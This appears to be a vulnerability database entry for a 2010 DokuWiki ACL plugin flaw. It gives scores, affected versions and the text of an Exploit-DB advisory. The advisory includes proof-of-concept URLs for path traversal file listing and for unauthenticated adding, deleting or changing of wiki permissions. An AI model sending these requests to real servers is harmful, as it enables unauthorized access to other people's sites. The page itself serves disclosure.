Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 11141
Publication date : 2010-01-13 23h00 +00:00
Author : IHTeam
EDB Verified : Yes
Reported: 13-01-2010
Patched: 13-01-2010
Released: 14-01-2010
Vulnerable version :
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25.tgz
Patched version:
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25b.tgz
Author: white_sheep
Contact:
[email protected] - https://www.ihteam.net
-------------------- Show Outside Directory
PoC :
http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/
The bug allows listing the names of arbitrary file on the webserver
- NOT THEIR CONTENTS.
-------------------- Arbitrary Change or Delete Wiki Permission
PoC :
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL)
add to acl.auth.php read or write authorization.
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
delete from acl.auth.php an eventually authorization like
(ACL).
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
delete from acl.auth.php all authorization like (ACL).
where (ACL) must be:
1 -> read
2 -> modified
4 -> creation
8 -> upload
16 -> delete
Products Mentioned
Configuraton 0
Dokuwiki>>Dokuwiki >> Version To (including) release_2009-02-14
Dokuwiki>>Dokuwiki >> Version 2004-07-04
Dokuwiki>>Dokuwiki >> Version 2004-07-07
Dokuwiki>>Dokuwiki >> Version 2004-07-12
Dokuwiki>>Dokuwiki >> Version 2004-07-21
Dokuwiki>>Dokuwiki >> Version 2004-07-25
Dokuwiki>>Dokuwiki >> Version 2004-08-08
Dokuwiki>>Dokuwiki >> Version 2004-08-15a
Dokuwiki>>Dokuwiki >> Version 2004-08-22
Dokuwiki>>Dokuwiki >> Version 2004-09-12
Dokuwiki>>Dokuwiki >> Version 2004-09-25
Dokuwiki>>Dokuwiki >> Version 2004-09-30
Dokuwiki>>Dokuwiki >> Version 2004-11-01
Dokuwiki>>Dokuwiki >> Version 2004-11-02
Dokuwiki>>Dokuwiki >> Version 2004-11-10
Dokuwiki>>Dokuwiki >> Version 2005-01-14
Dokuwiki>>Dokuwiki >> Version 2005-01-15
Dokuwiki>>Dokuwiki >> Version 2005-01-16a
Dokuwiki>>Dokuwiki >> Version 2005-02-06
Dokuwiki>>Dokuwiki >> Version 2005-02-18
Dokuwiki>>Dokuwiki >> Version 2005-05-07
Dokuwiki>>Dokuwiki >> Version 2005-07-01
Dokuwiki>>Dokuwiki >> Version 2005-07-13
Dokuwiki>>Dokuwiki >> Version 2005-09-19
Dokuwiki>>Dokuwiki >> Version 2005-09-22
Dokuwiki>>Dokuwiki >> Version 2006-03-05
Dokuwiki>>Dokuwiki >> Version 2006-03-09
Dokuwiki>>Dokuwiki >> Version 2006-03-09e
Dokuwiki>>Dokuwiki >> Version 2006-06-04
References